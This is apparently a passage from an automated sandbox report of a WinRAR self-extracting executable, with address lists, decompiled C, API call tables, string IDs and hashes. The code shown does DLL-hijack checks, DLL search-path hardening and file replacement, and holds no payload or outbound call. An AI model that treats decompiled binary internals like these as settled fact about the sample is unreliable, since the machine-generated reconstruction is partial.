    0x0084a78d
    0x0084a78d
    0x0084a79d
    0x0084a7a3
    0x0084a7aa
    0x0084a7c4
    0x0084a7cb
    0x0084a7df
    0x0084a7e5
    0x0084a7ec
    0x0084a7ee
    0x0084a800
    0x0084a80f
    0x0084a811
    0x0084a811
    0x0084a817
    0x0084a81d
    0x0084a824
    0x0084a841
    0x0084a84e
    0x0084a871
    0x0084a876
    0x0084a879
    0x0084a826
    0x0084a82b
    0x0084a82b
    0x0084a882
    0x0084a887
    0x0084a88e
    0x0084a897
    0x0084a897
    0x0084a89c
    0x0084a8a6
    0x0084a8a7
    0x0084a8aa
    0x0084a8b7
    0x0084a8b8
    0x0084a8ba
    0x0084a8cd
    0x0084a8d9
    0x0084a8db
    0x0084a8de
    0x0084a8e0
    0x0084a8f3
    0x0084a8f3
    0x0084a8f6
    0x0084a8f6
    0x0084a8fc
    0x0084a8fe
    0x0084a96d
    0x0084a96d
    0x0084a971
    0x0084abb5
    0x0084abbb
    0x0084abc5
    0x0084abdd
    0x0084abe3
    0x0084abf0
    0x0084abfb
    0x0084abfd
    0x0084abff
    0x0084ac0a
    0x0084ac0a
    0x0084ac13
    0x0084ac13
    0x0084ac19
    0x0084ac1b
    0x0084ac21
    0x0084ac22
    0x0084ac27
    0x0084ac29
    0x0084ac2f
    0x0084ac30
    0x0084ac35
    0x0084ac3a
    0x0084ac3b
    0x0084ac41
    0x0084ac46
    0x0084ac48
    0x0084ac4e
    0x0084ac55
    0x0084ac56
    0x0084ac5b
    0x0084ac62
    0x0084ac64
    0x0084ac6b
    0x0084ac6d
    0x0084ac74
    0x0084ac76
    0x0084ac78
    0x0084ac7e
    0x0084ac7f
    0x0084ac7f
    0x0084ac74
    0x0084ac6b
    0x0084ac87
    0x0084ac8c
    0x0084ac8c
    0x0084ac93
    0x00000000
    0x0084ac93
    0x0084a977
    0x0084a97e
    0x0084a97e
    0x0084a981
    0x0084a981
    0x0084a983
    0x0084a987
    0x0084a989
    0x0084ab4b
    0x0084ab4b
    0x0084ab4f
    0x0084ab5f
    0x0084ab78
    0x0084ab86
    0x0084aba0
    0x0084aba5
    0x0084aba5
    0x0084a6e0
    0x0084a6e0
    0x00000000
    0x0084a6e0
    0x0084a99d
    0x0084a9b4
    0x0084a9b9
    0x0084a9d6
    0x0084a9db
    0x0084a9de
    0x0084a9eb
    0x0084a9f2
    0x0084a9fb
    0x0084aa13
    0x0084aa16
    0x0084aa1d
    0x0084aa20
    0x0084aa23
    0x0084aa30
    0x0084aa32
    0x0084aa35
    0x0084aa37
    0x0084aac2
    0x0084aa3d
    0x0084aa3d
    0x0084aa44
    0x0084aa4a
    0x0084aa4c
    0x0084aa59
    0x0084aa59
    0x0084aa65
    0x0084aa71
    0x0084aa7d
    0x0084aa88
    0x0084aa94
    0x0084aab2
    0x0084aab5
    0x0084aaba
    0x0084aaba
    0x0084aac9
    0x0084aadd
    0x0084aaee
    0x0084aaf3
    0x0084aaf5
    0x0084ab2f
    0x0084ab32
    0x00000000
    0x0084aaf7
    0x0084aaff
    0x0084ab05
    0x0084ab05
    0x0084ab05
    0x0084ab09
    0x0084ab0c
    0x0084ab0c
    0x0084ab0f
    0x00000000
    0x00000000
    0x0084ab13
    0x0084ab1c
    0x0084ab1d
    0x0084ab20
    0x0084ab23
    0x00000000
    0x00000000
    0x00000000
    0x0084ab23
    0x0084ab28
    0x0084ab35
    0x0084ab35
    0x0084ab39
    0x0084ab3c
    0x0084ab45
    0x0084ab45
    0x00000000
    0x0084ab39
    0x0084aaf5
    0x0084a900
    0x0084a902
    0x00000000
    0x00000000
    0x0084a91c
    0x0084a921
    0x0084a92a
    0x0084a92f
    0x0084a939
    0x0084a93b
    0x0084a942
    0x0084a947
    0x0084a94a
    0x0084a94c
    0x0084a94e
    0x0084a950
    0x0084a953
    0x0084a955
    0x0084a955
    0x0084a953
    0x0084a958
    0x0084a958
    0x0084a958
    0x0084a962
    0x0084a967
    0x00000000
    0x0084a967
    0x0084a8e2
    0x0084a8e4
    0x0084a8e7
    0x0084a8ea
    0x00000000
    0x00000000
    0x0084a8ec
    0x0084a8ee
    0x00000000
    0x0084a8bc
    0x0084a8bc
    0x0084a8be
    0x0084a8c1
    0x0084a8c8
    0x0084a8ca
    0x00000000
    0x0084a8ca
    0x0084a8c3
    0x0084a8c6
    0x00000000
    0x00000000
    0x00000000
    0x0084a8c6
    0x0084a7cd
    0x0084a7cf
    0x0084a7d0
    0x0084a7d2
    0x0084ac98
    0x0084ac98
    0x0084ac9f
    0x00000000
    0x00000000
    0x0084aca5
    0x0084aca7
    0x00000000
    0x00000000
    0x0084acb2
    0x0084acc0
    0x0084acc6
    0x0084accc
    0x0084accf
    0x0084acda
    0x0084ace4
    0x0084ace4
    0x0084ace9
    0x0084acec
    0x0084acd1
    0x0084acd1
    0x0084acd1
    0x0084acf5
    0x0084ad03
    0x00000000
    0x0084ad03
    0x0084a7cb
    0x0084a7ae
    0x0084a7af
    0x0084a7b6
    0x00000000
    0x00000000
    0x00000000
    0x0084a7b6
    0x0084a6fb
    0x0084a702
    0x00000000
    0x0084a708
    0x0084a708
    0x0084a70f
    0x0084a714
    0x0084a716
    0x0084a725
    0x0084a72d
    0x0084a730
    0x0084a77f
    0x0084a77f
    0x0084a786
    0x0084a788
    0x0084a788
    0x0084a738
    0x0084a73f
    0x00000000
    0x00000000
    0x0084a74e
    0x0084a754
    0x0084a756
    0x00000000
    0x0084a75c
    0x0084a761
    0x0084a767
    0x0084a769
    0x0084a76f
    0x0084a779
    0x0084a779
    0x00000000
    0x0084a769
    0x0084a756
    0x00000000
    0x0084a77f
    0x0084a702
    0x0084a685
    0x0084a685
    0x0084a688
    0x0084a6c3
    0x0084a6c4
    0x0084a6cb
    0x0084a6d1
    0x00000000
    0x00000000
    0x0084a6d3
    0x0084a6da
    0x00000000
    0x00000000
    0x00000000
    0x0084a6da
    0x0084a68a
    0x0084a68d
    0x0084a6a6
    0x0084a6ab
    0x0084a6ad
    0x0084a6b9
    0x0084a6b9
    0x00000000
    0x0084a6ad
    0x00000000
    0x0084a68d
    0x0084a664
    0x0084a666
    0x00000000

    APIs
    • __EH_prolog.LIBCMT ref: 0084A631
      • Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
      • Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prologItemTextWindow
    • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
    • API String ID: 810644672-1650746426
    • Opcode ID: 4afc9d456bd05dc15f195a4d37edc290169b368e176cca5f91897b9f7673e673
    • Instruction ID: a171b20f7d56504f16d8e0ee0c87724aab8b17d119a1b4965b7310faa8268fa5
    • Opcode Fuzzy Hash: 4afc9d456bd05dc15f195a4d37edc290169b368e176cca5f91897b9f7673e673
    • Instruction Fuzzy Hash: F842E571A8431CBEEB25AB64DC89FBE3B6CFB11700F054065F645EA1D1CBB58984CB62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E0083FD60(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
    				char _v1;
    				long _v4;
    				char* _t118;
    				void* _t126;
    				int _t130;
    				long _t141;
    				int _t167;
    				_Unknown_base(*)()* _t176;
    				_Unknown_base(*)()* _t177;
    				signed char _t184;
    				struct _SECURITY_ATTRIBUTES* _t197;
    				long _t199;
    				void* _t200;
    				struct HINSTANCE__* _t203;
    				signed int _t205;
    				signed int _t207;
    				void* _t208;
    				signed int _t209;
    				int _t210;
    				void* _t212;
    
    				E0084D9C0();
    				_push(_t209);
    				_a3 = 0;
    				_t203 = GetModuleHandleW(L"kernel32");
    				if(_t203 == 0) {
    					L5:
    					_t118 =  *0x86d080; // 0x862884
    					_t210 = _t209 | 0xffffffff;
    					_t204 = 0x800;
    					_a8 = L"version.dll";
    					_a12 = L"DXGIDebug.dll";
    					_a16 = L"sfc_os.dll";
    					_a20 = L"SSPICLI.DLL";
    					_a24 = L"rsaenh.dll";
    					_a28 = L"UXTheme.dll";
    					_a32 = L"dwmapi.dll";
    					_a36 = L"cryptbase.dll";
    					_a40 = L"lpk.dll";
    					_a44 = L"usp10.dll";
    					_a48 = L"clbcatq.dll";
    					_a52 = L"comres.dll";
    					_a56 = L"ws2_32.dll";
    					_a60 = L"ws2help.dll";
    					_a64 = L"psapi.dll";
    					_a68 = L"ieframe.dll";
    					_a72 = L"ntshrui.dll";
    					_a76 = L"atl.dll";
    					_a80 = L"setupapi.dll";
    					_a84 = L"apphelp.dll";
    					_a88 = L"userenv.dll";
    					_a92 = L"netapi32.dll";
    					_a96 = L"shdocvw.dll";
    					_a100 = L"crypt32.dll";
    					_a104 = L"msasn1.dll";
    					_a108 = L"cryptui.dll";
    					_a112 = L"wintrust.dll";
    					_a116 = L"shell32.dll";
    					_a120 = L"secur32.dll";
    					_a124 = L"cabinet.dll";
    					_a128 = L"oleaccrc.dll";
    					_a132 = L"ntmarta.dll";
    					_a136 = L"profapi.dll";
    					_a140 = L"WindowsCodecs.dll";
    					_a144 = L"srvcli.dll";
    					_a148 = L"cscapi.dll";
    					_a152 = L"slc.dll";
    					_a156 = L"imageres.dll";
    					_a160 = L"dnsapi.DLL";
    					_a164 = L"iphlpapi.DLL";
    					_a168 = L"WINNSI.DLL";
    					_a172 = L"netutils.dll";
    					_a176 = L"mpr.dll";
    					_a180 = L"devrtl.dll";
    					_a184 = L"propsys.dll";
    					_a188 = L"mlang.dll";
    					_a192 = L"samcli.dll";
    					_a196 = L"samlib.dll";
    					_a200 = L"wkscli.dll";
    					_a204 = L"dfscli.dll";
    					_a208 = L"browcli.dll";
    					_a212 = L"rasadhlp.dll";
    					_a216 = L"dhcpcsvc6.dll";
    					_a220 = L"dhcpcsvc.dll";
    					_a224 = L"XmlLite.dll";
    					_a228 = L"linkinfo.dll";
    					_a232 = L"cryptsp.dll";
    					_a236 = L"RpcRtRemote.dll";
    					_a240 = L"aclui.dll";
    					_a244 = L"dsrole.dll";
    					_a248 = L"peerdist.dll";
    					if( *_t118 == 0x78) {
    						L14:
    						GetModuleFileNameW(0,  &_a772, _t204);
    						E0083FAE7( &_a9160, E0083B9E0(_t225,  &_a772), _t204);
    						_t197 = 0;
    						_t205 = 0;
    						do {
    							if(E0083AA39() < 0x600) {
    								_t126 = 0;
    								__eflags = 0;
    							} else {
    								_t126 = E0083FD16( *((intOrPtr*)(_t212 + 0x18 + _t205 * 4))); // executed
    							}
    							if(_t126 == 0) {
    								L20:
    								_push(0x800);
    								E0083BA56(_t229,  &_a772,  *((intOrPtr*)(_t212 + 0x1c + _t205 * 4)));
    								_t130 = GetFileAttributesW( &_a760); // executed
    								if(_t130 != _t210) {
    									_t197 =  *((intOrPtr*)(_t212 + 0x18 + _t205 * 4));
    									L24:
    									if(_v1 != 0) {
    										L30:
    										_t236 = _t197;
    										if(_t197 == 0) {
    											return _t130;
    										}
    										E0083BA2A(_t236,  &_a768);
    										if(E0083AA39() < 0x600) {
    											_push( &_a9160);
    											_push( &_a768);
    											E00833F53( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t197);
    											_t212 = _t212 + 0x18;
    											_t130 = AllocConsole();
    											__eflags = _t130;
    											if(_t130 != 0) {
    												__imp__AttachConsole(GetCurrentProcessId());
    												_t141 = E00852B93( &_a4860);
    												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
    												Sleep(0x2710);
    												_t130 = FreeConsole();
    											}
    										} else {
    											E0083FD16(L"dwmapi.dll");
    											E0083FD16(L"uxtheme.dll");
    											_push( &_a9152);
    											_push( &_a760);
    											E00833F53( &_a4852, 0x864, E0083DA8B(0xf1), _t197);
    											_t212 = _t212 + 0x18;
    											_t130 = E008497A8(0,  &_a4848, E0083DA8B(0xf0), 0x30);
    										}
    										ExitProcess(0);
    									}
    									_t207 = 0;
    									while(1) {
    										_push(0x800);
    										E0083BA56(0,  &_a768,  *((intOrPtr*)(_t212 + 0x3c + _t207 * 4)));
    										_t130 = GetFileAttributesW( &_a756);
    										if(_t130 != _t210) {
    											break;
    										}
    										_t207 = _t207 + 1;
    										if(_t207 < 0x35) {
    											continue;
    										}
    										goto L30;
    									}
    									_t197 =  *((intOrPtr*)(_t212 + 0x38 + _t207 * 4));
    									goto L30;
    								}
    							} else {
    								_t130 = CompareStringW(0x400, 0x1001,  *(_t212 + 0x24 + _t205 * 4), _t210, L"DXGIDebug.dll", _t210); // executed
    								_t229 = _t130 - 2;
    								if(_t130 != 2) {
    									goto L21;
    								}
    								goto L20;
    							}
    							L21:
    							_t205 = _t205 + 1;
    						} while (_t205 < 8);
    						goto L24;
    					}
    					_t199 = E008566D8(_t185, _t118);
    					if(_t199 == 0) {
    						goto L14;
    					}
    					GetModuleFileNameW(0,  &_a4868, 0x800);
    					_t208 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
    					if(_t208 == _t210 || SetFilePointer(_t208, _t199, 0, 0) != _t199) {
    						L13:
    						CloseHandle(_t208);
    						_t204 = 0x800;
    						goto L14;
    					} else {
    						_t167 = ReadFile(_t208,  &_a13260, 0x7ffe,  &_a4, 0);
    						_t224 = _t167;
    						if(_t167 == 0) {
    							goto L13;
    						}
    						_push(0x104);
    						 *((short*)(_t212 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
    						_push( &_a252);
    						_push( &_a13260);
    						while(1) {
    							_t200 = E0083F86B(_t224);
    							_t225 = _t200;
    							if(_t200 == 0) {
    								goto L13;
    							}
    							E0083FD16( &_a252);
    							_push(0x104);
    							_push( &_a248);
    							_push(_t200);
    						}
    						goto L13;
    					}
    				}
    				_t176 = GetProcAddress(_t203, "SetDllDirectoryW");
    				_t184 = _a46032;
    				if(_t176 != 0) {
    					asm("sbb ecx, ecx");
    					_t185 =  ~(_t184 & 0x000000ff) & 0x008622e4;
    					 *_t176( ~(_t184 & 0x000000ff) & 0x008622e4);
    				}
    				_t177 = GetProcAddress(_t203, "SetDefaultDllDirectories");
    				if(_t177 != 0) {
    					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
    					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
    					_v1 = 1;
    				}
    				goto L5;
    			}























    0x0083fd65
    0x0083fd6b
    0x0083fd73
    0x0083fd7e
    0x0083fd82
    0x0083fdd5
    0x0083fdd5
    0x0083fdda
    0x0083fde3
    0x0083fde8
    0x0083fdf0
    0x0083fdfb
    0x0083fe03
    0x0083fe0b
    0x0083fe13
    0x0083fe1b
    0x0083fe23
    0x0083fe2b
    0x0083fe33
    0x0083fe3b
    0x0083fe43
    0x0083fe4b
    0x0083fe53
    0x0083fe5b
    0x0083fe63
    0x0083fe6b
    0x0083fe73
    0x0083fe7b
    0x0083fe83
    0x0083fe8b
    0x0083fe93
    0x0083fe9b
    0x0083fea3
    0x0083feab
    0x0083feb3
    0x0083febb
    0x0083fec6
    0x0083fed1
    0x0083fedc
    0x0083fee7
    0x0083fef2
    0x0083fefd
    0x0083ff08
    0x0083ff13
    0x0083ff1e
    0x0083ff29
    0x0083ff34
    0x0083ff3f
    0x0083ff4a
    0x0083ff55
    0x0083ff60
    0x0083ff6b
    0x0083ff76
    0x0083ff81
    0x0083ff8c
    0x0083ff97
    0x0083ffa2
    0x0083ffad
    0x0083ffb8
    0x0083ffc3
    0x0083ffce
    0x0083ffd9
    0x0083ffe4
    0x0083ffef
    0x0083fffa
    0x00840005
    0x00840010
    0x0084001b
    0x00840026
    0x00840031
    0x0084003c
    0x0084010a
    0x00840115
    0x0084012e
    0x00840139
    0x0084013b
    0x0084013d
    0x00840147
    0x00840154
    0x00840154
    0x00840149
    0x0084014d
    0x0084014d
    0x00840158
    0x0084017a
    0x0084017a
    0x0084018b
    0x00840198
    0x0084019c
    0x008401a6
    0x008401aa
    0x008401af
    0x008401e3
    0x008401e3
    0x008401e5
    0x008402fc
    0x008402fc
    0x008401f3
    0x00840202
    0x00840271
    0x00840279
    0x0084028d
    0x00840292
    0x00840295
    0x0084029b
    0x0084029d
    0x008402a6
    0x008402bb
    0x008402d3
    0x008402de
    0x008402e4
    0x008402e4
    0x00840204
    0x00840209
    0x00840213
    0x0084021f
    0x00840227
    0x00840241
    0x00840246
    0x00840260
    0x00840260
    0x008402ec
    0x008402ec
    0x008401b1
    0x008401b3
    0x008401b3
    0x008401c4
    0x008401d1
    0x008401d5
    0x00000000
    0x00000000
    0x008401d7
    0x008401db
    0x00000000
    0x00000000
    0x00000000
    0x008401dd
    0x008401df
    0x00000000
    0x008401df
    0x0084015a
    0x0084016f
    0x00840175
    0x00840178
    0x00000000
    0x00000000
    0x00000000
    0x00840178
    0x0084019e
    0x0084019e
    0x0084019f
    0x00000000
    0x008401a4
    0x00840048
    0x0084004d
    0x00000000
    0x00000000
    0x0084005e
    0x0084007c
    0x00840080
    0x008400fe
    0x008400ff
    0x00840105
    0x00000000
    0x00840092
    0x008400a7
    0x008400ad
    0x008400af
    0x00000000
    0x00000000
    0x008400b9
    0x008400be
    0x008400cd
    0x008400d5
    0x008400f3
    0x008400f8
    0x008400fa
    0x008400fc
    0x00000000
    0x00000000
    0x008400e0
    0x008400e5
    0x008400f1
    0x008400f2
    0x008400f2
    0x00000000
    0x008400f3
    0x00840080
    0x0083fd90
    0x0083fd92
    0x0083fd9b
    0x0083fda2
    0x0083fda4
    0x0083fdab
    0x0083fdab
    0x0083fdb3
    0x0083fdb7
    0x0083fdc7
    0x0083fdce
    0x0083fdd0
    0x0083fdd0
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32 ref: 0083FD78
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0083FD90
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0083FDB3
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0084005E
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00840076
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00840088
    • ReadFile.KERNEL32(00000000,?,00007FFE,008628D4,00000000), ref: 008400A7
    • CloseHandle.KERNEL32(00000000), ref: 008400FF
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00840115
    • CompareStringW.KERNELBASE(00000400,00001001,00862920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0084016F
    • GetFileAttributesW.KERNELBASE(?,?,008628EC,00000800,?,00000000,?,00000800), ref: 00840198
    • GetFileAttributesW.KERNEL32(?,?,008629AC,00000800), ref: 008401D1
      • Part of subcall function 0083FD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0083FD31
      • Part of subcall function 0083FD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083E82C,Crypt32.dll,?,0083E8AE,?,0083E892,?,?,?,?), ref: 0083FD53
    • _swprintf.LIBCMT ref: 00840241
    • _swprintf.LIBCMT ref: 0084028D
      • Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66
    • AllocConsole.KERNEL32 ref: 00840295
    • GetCurrentProcessId.KERNEL32 ref: 0084029F
    • AttachConsole.KERNEL32(00000000), ref: 008402A6
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 008402CC
    • WriteConsoleW.KERNEL32(00000000), ref: 008402D3
    • Sleep.KERNEL32(00002710), ref: 008402DE
    • FreeConsole.KERNEL32 ref: 008402E4
    • ExitProcess.KERNEL32 ref: 008402EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
    • API String ID: 1201351596-3298887752
    • Opcode ID: 37c30dc6e4805e33b3a6ae9334ebf24a9a86f386b2130e6f215cc4d7e4e78dbb
    • Instruction ID: 07cd7c71456f4588babb9d76ea1f6bfac1d119362f24649ee8927e75ff917296
    • Opcode Fuzzy Hash: 37c30dc6e4805e33b3a6ae9334ebf24a9a86f386b2130e6f215cc4d7e4e78dbb
    • Instruction Fuzzy Hash: 49D162B1408B849AD335DF94C849B9FBBE8FB85344F52095DE389D6281CBB4854CCBA3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 49%
    			E0084B522(void* __ecx, void* __edx) {
    				intOrPtr _t215;
    				void* _t220;
    				intOrPtr _t278;
    				void* _t292;
    				WCHAR* _t294;
    				void* _t297;
    				WCHAR* _t298;
    				void* _t303;
    
    				_t292 = __edx;
    				E0084D8C4(E00861599, __ecx);
    				_t215 = 0x1bc80;
    				E0084D9C0();
    				if( *((intOrPtr*)(_t303 + 0xc)) == 0) {
    					L169:
    					 *[fs:0x0] =  *((intOrPtr*)(_t303 - 0xc));
    					return _t215;
    				}
    				_push(0x1000);
    				_push(_t303 - 0xe);
    				_push(_t303 - 0xd);
    				_push(_t303 - 0x5c84);
    				_push(_t303 - 0xfc8c);
    				_push( *((intOrPtr*)(_t303 + 0xc)));
    				_t215 = E0084A1C9();
    				 *((intOrPtr*)(_t303 + 0xc)) = 0x1bc80;
    				if(0x1bc80 != 0) {
    					_t278 =  *((intOrPtr*)(_t303 + 0x10));
    					do {
    						_t220 = _t303 - 0x5c84;
    						_t297 = _t303 - 0x1bc8c;
    						_t294 = 6;
    						goto L4;
    						L6:
    						while(E00841438(_t303 - 0xfc8c,  *((intOrPtr*)(0x86d618 + _t298 * 4))) != 0) {
    							_t298 =  &(_t298[0]);
    							if(_t298 < 0xe) {
    								continue;
    							} else {
    								goto L167;
    							}
    						}
    						if(_t298 > 0xd) {
    							goto L167;
    						}
    						switch( *((intOrPtr*)(_t298 * 4 +  &M0084C132))) {
    							case 0:
    								__eflags = _t278 - 2;
    								if(_t278 != 2) {
    									goto L167;
    								}
    								_t300 = 0x800;
    								E0084966B(_t303 - 0x7c84, 0x800);
    								E0083A22C(E0083B6C2(_t303 - 0x7c84, _t303 - 0x5c84, _t303 - 0xdc8c, 0x800), _t278, _t303 - 0x8c8c, 0x800);
    								 *(_t303 - 4) = _t294;
    								E0083A366(_t303 - 0x8c8c, _t303 - 0xdc8c);
    								E00836FEC(_t303 - 0x3c84);
    								_push(_t294);
    								_t287 = _t303 - 0x8c8c;
    								_t238 = E0083A2B9(_t303 - 0x8c8c, _t292, _t303 - 0x3c84);
    								__eflags = _t238;
    								if(_t238 == 0) {
    									L28:
    									 *(_t303 - 4) =  *(_t303 - 4) | 0xffffffff;
    									E0083A242(_t303 - 0x8c8c);
    									goto L167;
    								} else {
    									goto L15;
    									L16:
    									E0083B254(_t287, __eflags, _t303 - 0x7c84, _t303 - 0x103c, _t300);
    									E0083AF49(__eflags, _t303 - 0x103c, _t300);
    									_t302 = E00852B93(_t303 - 0x7c84);
    									__eflags = _t302 - 4;
    									if(_t302 < 4) {
    										L18:
    										_t266 = E0083B682(_t303 - 0x5c84);
    										__eflags = _t266;
    										if(_t266 != 0) {
    											goto L28;
    										}
    										L19:
    										_t268 = E00852B93(_t303 - 0x3c84);
    										__eflags = 0;
    										 *((short*)(_t303 + _t268 * 2 - 0x3c82)) = 0;
    										E0084E920(_t294, _t303 - 0x3c, _t294, 0x1e);
    										_t305 = _t305 + 0x10;
    										 *((intOrPtr*)(_t303 - 0x38)) = 3;
    										_push(0x14);
    										_pop(_t271);
    										 *((short*)(_t303 - 0x2c)) = _t271;
    										 *((intOrPtr*)(_t303 - 0x34)) = _t303 - 0x3c84;
    										_push(_t303 - 0x3c);
    										 *0x86def4();
    										goto L20;
    									}
    									_t276 = E00852B93(_t303 - 0x103c);
    									__eflags = _t302 - _t276;
    									if(_t302 > _t276) {
    										goto L19;
    									}
    									goto L18;
    									L20:
    									_t243 = GetFileAttributesW(_t303 - 0x3c84);
    									__eflags = _t243 - 0xffffffff;
    									if(_t243 == 0xffffffff) {
    										L27:
    										_push(_t294);
    										_t287 = _t303 - 0x8c8c;
    										_t245 = E0083A2B9(_t303 - 0x8c8c, _t292, _t303 - 0x3c84);
    										__eflags = _t245;
    										if(_t245 != 0) {
    											_t300 = 0x800;
    											L15:
    											SetFileAttributesW(_t303 - 0x3c84, _t294);
    											__eflags =  *((char*)(_t303 - 0x2c78));
    											if(__eflags == 0) {
    												goto L20;
    											}
    											goto L16;
    										}
    										goto L28;
    									}
    									_t247 = DeleteFileW(_t303 - 0x3c84);
    									__eflags = _t247;
    									if(_t247 != 0) {
    										goto L27;
    									} else {
    										_t301 = _t294;
    										_push(_t294);
    										goto L24;
    										L24:
    										E00833F53(_t303 - 0x103c, 0x800, L"%s.%d.tmp", _t303 - 0x3c84);
    										_t305 = _t305 + 0x14;
    										_t252 = GetFileAttributesW(_t303 - 0x103c);
    										__eflags = _t252 - 0xffffffff;
    										if(_t252 != 0xffffffff) {
    											_t301 = _t301 + 1;
    											__eflags = _t301;
    											_push(_t301);
    											goto L24;
    										} else {
    											_t255 = MoveFileW(_t303 - 0x3c84, _t303 - 0x103c);
    											__eflags = _t255;
    											if(_t255 != 0) {
    												MoveFileExW(_t303 - 0x103c, _t294, 4);
    											}
    											goto L27;
    										}
    									}
    								}
    							case 1:
    								__eflags = __ebx;
    								if(__ebx == 0) {
    									__eax = E00852B93(__esi);
    									__eax = __eax + __edi;
    									_push(__eax);
    									_push( *0x88ce0c);
    									__eax = E00852BBE(__ecx, __edx);
    									__esp = __esp + 0xc;
    									__eflags = __eax;
    									if(__eax != 0) {
    										 *0x88ce0c = __eax;
    										__eflags = __bl;
    										if(__bl != 0) {
    											__ecx = 0;
    											__eflags = 0;
    											 *__eax = __cx;
    										}
    										__eax = E00856763(__eax, __esi);
    										_pop(__ecx);
    										_pop(__ecx);
    									}
    									__eflags = __bh;
    									if(__bh == 0) {
    										__eax = L00852BAE(__esi);
    									}
    								}
    								goto L167;
    							case 2:
    								__eflags = __ebx;
    								if(__ebx == 0) {
    									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
    								}
    								goto L167;
    							case 3:
    								__eflags = __ebx;
    								if(__ebx != 0) {
    									goto L167;
    								}
    								__eflags =  *0x879602 - __di;
    								if( *0x879602 != __di) {
    									goto L167;
    								}
    								__eax = 0;
    								__edi = __ebp - 0x5c84;
    								_push(0x22);
    								 *(__ebp - 0x103c) = __ax;
    								_pop(__eax);
    								__eflags =  *(__ebp - 0x5c84) - __ax;
    								if( *(__ebp - 0x5c84) == __ax) {
    									__edi = __ebp - 0x5c82;
    								}
    								__eax = E00852B93(__edi);
    								__esi = 0x800;
    								__eflags = __eax - 0x800;
    								if(__eax >= 0x800) {
    									goto L167;
    								} else {
    									__eax =  *__edi & 0x0000ffff;
    									_push(0x5c);
    									_pop(__ecx);
    									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
